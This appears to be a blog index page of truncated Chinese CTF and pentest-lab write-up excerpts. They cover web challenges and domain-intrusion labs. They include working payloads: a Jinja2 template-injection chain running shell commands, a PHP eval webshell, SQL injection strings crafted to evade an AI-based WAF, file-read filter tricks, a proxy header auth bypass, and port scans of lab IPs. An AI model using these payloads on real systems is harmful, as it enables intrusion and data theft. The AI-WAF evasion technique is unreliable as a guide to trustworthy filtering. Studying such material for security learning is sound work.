仙心

2025春秋杯网络安全联赛冬季赛webHyperNode文件读取+目录穿越 Static_Secret目录穿越 Dev’s Regretgit泄露 Session_Leak修改这里的testuser为admin My_Hidden_Profile直接/login登录即可 EZSQL Hello User1{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag.txt').read()") }}{% endif %}{% endfor %} RSS_Parser12345...

LilacCTF 2026webkeep考察内容为PHP 7.4.21 Development Server源码泄露漏洞常见利用方法为泄露源码，这里第一步也是如此，poc如下 12345GET /index.php HTTP/1.1Host: 61.147.171.35:49192GET /1.txt HTTP/1.1 拿到源码 123456<?php@error_reporting(~E_ALL);echo "Hello World!" . PHP_EOL;// s3Cr37_f1L3.php.bak 然后根据提示，访问/s3Cr37_f1L3.php.bak 123<?php@eval($_POST["admin"]); 但是并不存在s3Cr37_f1L3.php文件，所以需要想办法让s3Cr37_f1L3.php.bak文件按php文件解析，这也可以利用上面的漏洞，本质上是发两个包，第一个为实际访问的文件也就是s3Cr37_f1L3.php.bak，第二个用来控制为我们想让他解析的形式，这里任意放一个xxx.ph...

ciscnwebAI_WAF很明显的sql注入，题目表示为ai检测的waf，尝试fuzz发现过滤了一些字符，同时置信度各不相同猜测为ai检测输入的sql语句的危险度尝试填充脏数据绕过-1'union select 1,database(),3#1111111111111111111111111111111111发现无论填充多少都还是返回置信度为1，被过滤后续尝试之前羊城杯2025的update题目的payload1' and ('def','m','',4,5,6)<=(table information_schema.schemata limit 1)#发现居然正常回显了，而and在之前的fuzz中置信度很高，无法通过过滤这说明这段语句的and的置信度被其他部分拉低了，尝试后发现只要有information_schema.schemata或table等低置信度sql注入关键词填充进去就可以减低置信度payload如下-1'union select 1,database(),3#('def...

DasCtf2025 下半年赛webSecretPhotoGallery登录框发现能注入，题目提示为sqlite数据库，且数据库为空。用admin' union select 1, 1, 1;成功登录。登录后给了jwt认证token，前端每一个图片有一个的文件名，收集起来是 GALLERY2024SECRET，是jwt秘钥。签个admin权限即可进入管理页面，可以include任意文件，伪协议读取flag.php，发现base64被过滤，换个filter即可php://filter/convert.iconv.UTF-8.UTF-16/resource=flag.php devweb分析网站js文件 登录功能用户输入用户名和密码密码使用RSA公钥加密后发送到 http://localhost:8080/login使用Axios发送POST请求 文件下载文件列表包含 app.jmx 和 index.html下载链接格式：/download?file={文件名}&sign=6f742c2e79030435b7edc1d79b8678f6...

铸剑杯web浅析PHP原生类1你是一家金融科技公司的安全工程师。公司的核心交易平台依赖一个高性能的日志聚合微服务来收集和处理来自各个业务模块的日志。为了追求极致的性能和“零依赖”，该服务的早期版本直接使用 unserialize来处理序列化后的日志事件流。 源代码如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556 <?phphighlight_file(__FILE__);class install { private $username; private $password; public function __wakeup() { echo "Hello,".$this->username; } public function __toString() { ($this-&g...

RCTFwebrootkb Try to root my MaxKB. 12>FROM 1panel/maxkb:v2.3.1>COPY flag /root/flag Credential is default: admin / MaxKB@123.. 给了一个github的开源项目MaxKB，版本是2.3.1，把源代码下下来部署看看发现可以在工具里面进行python代码执行，但是有沙箱，看源文件里面的dockerfile文件和tool_code.py文件gcc -shared -fPIC -o ${MAXKB_SANDBOX_HOME}/sandbox.so /opt/maxkb-app/installer/sandbox.c 123kwargs['env'] = { 'LD_PRELOAD': f'{self.sandbox_path}/sandbox.so',} 是通过sandbox.so进行沙箱限制的，然后还用了LD_PR...

TunnelX在”TunnelX”靶场中，模拟了一个封闭的内网环境，完成该挑战可以帮助玩家了解内网渗透中不出网环境下的代理转发、内网扫描、信息收集、kerberos协议以及横向移动技术方法，加强对域环境核心认证机制的理解，并学习如何利用不同技术组合来实现横向移动和攻击内部系统。该靶场共有4个flag，分布于不同的靶机。 剧情第1关 请测试暴露在公网上的 Web 应用的安全性，并尝试获取目标数据库权限。 第2关由于处于一个封闭的内网环境。搭建好特定的隧道，对目标内网展开信息收集。 第3关寻找到主机上的薄弱点，尝试将权限提升至SYSTEM。 第4关发现域控制器所存在的漏洞，尝试获取域内管理员权限。 tagKerberos、内网渗透、域滲透 信息搜集先用fscan扫一下机器./fscan.exe -h 39.98.121.198 -p 1-65535 12345678910111213141516171819start infoscan39.98.121.198:80 open39.98.121.198:2121 open39.98.121.198:3389 op...

FlarumFlarum是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、kerberos协议以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag，分布于不同的靶机。 剧情第1关请测试 Flarum 社区后台登录口令的安全性，并获取在该服务器上执行任意命令的能力。第2关通过kerberos攻击的获取域内权限，并进行信息收集。第3关请尝试获取内网中Fileserver主机的权限，并发现黑客留下的域控制器后门。第4关请尝试利用黑客留下的域控制器后门获取域控的权限。 tagKerberos、DCSync、Flarum、Decrypt、域滲透 信息搜集先用fscan扫一下机器./fscan.exe -h 39.99.157.81 12345678start infoscan39.99.157.81:22 open39.99.157.81:80 open[*] alive ports len is: 2start vulscan[*] WebTitle http://39.99.1...

羊城杯2025webez_unserialize123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102<?php error_reporting(0);highlight_file(__FILE__); class A { public $first; public $step; public $next; public function __construct() { $this->first = "继续加油！"; } public function start() { echo $this->ne...

强网杯webSecretVault考点参考如下文章Hop-by-hop header vulnerability in Go Standard Library Reverse Proxy漏洞点在uid = request.headers.get('X-User', '0')当X-User为空时，默认值为0而admin的uid刚好为0所以当我们利用文章中的payload在Connection中加入X-User，即可在代理加入X-User头后再次将其删除，payload如下Connection: close,X-User成功拿到flag bbjv关键代码为 123456789101112131415161718192021222324@RestControllerpublic class GatewayController { private final EvaluationService evaluationService; public GatewayController(EvaluationService evaluatio...

WMCTF2025webguess123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109from flask import Flask, request, jsonify, session, render_template, redirectimport randomrd = random.Random()def generate_random_string(): return str(rd.getrandbits(32))app = Flask(__name__)app.secret_key = generate_random_string()users = []a = generate_ran...

ThermalPowertag内网渗透、Shiro、SCADA、工控安全 题目描述该场景模拟仿真了电力生产企业的部分业务场景。“火创能源” 公司在未充分重视网络安全的威胁的情况下，将敏感区域的服务错误地配置在公网上，使得外部的 APT 组织可以轻松地访问这些服务，最终导致控制电力分配、生产流程和其他关键设备的服务遭受攻击，并部署了勒索病毒。 玩家的任务是分析 APT 组织的渗透行为，按照关卡列表恢复其攻击路径，并对勒索病毒加密的文件进行解密。 附件地址：https://pan.baidu.com/s/13jTP6jWi6tLWkbyO8SQSnQ?pwd=kj6h 解题背景第1关 评估暴露在公网的服务的安全性，尝试建立通向生产区的立足点。 第2关尝试接管 SCADA 工程师的个人 PC，并通过滥用 Windows 特权组提升至系统权限。 第3关尝试接管 SCADA 工程师站，并启动锅炉。 第4关尝试获取 SCADA 工程师站中的数据库备份，并分析备份文件是否泄漏了敏感数据。 信息搜集先用fscan扫一下机器./fscan.exe -h 39.98.127.19...